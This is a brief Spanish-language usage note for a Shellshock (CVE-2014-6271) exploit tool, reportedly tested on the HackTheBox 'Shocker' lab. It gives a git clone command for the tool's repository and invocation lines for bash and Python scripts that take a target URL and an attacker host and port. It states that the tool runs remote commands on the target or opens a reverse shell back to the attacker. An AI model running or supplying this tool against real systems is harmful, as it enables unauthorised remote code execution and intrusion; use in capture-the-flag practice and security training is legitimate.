
[Python/Shell] - Probado en HackTheBox - Shocker (Fácil) CVE-2014-6271
sudo git clone https://github.com/Gurguii/shellshock.sh
bash shellshock.sh -u <url> -h* <lhost> -p* <lport>
python3 shellshock.py -u <url> -lh* <lhost> -lp* <lport>
Nota: el LPORT por defecto es 4444, se requiere URL. Si solo se proporciona la URL, hará RCE; de lo contrario, hará RSHELL al lhost y lport dados.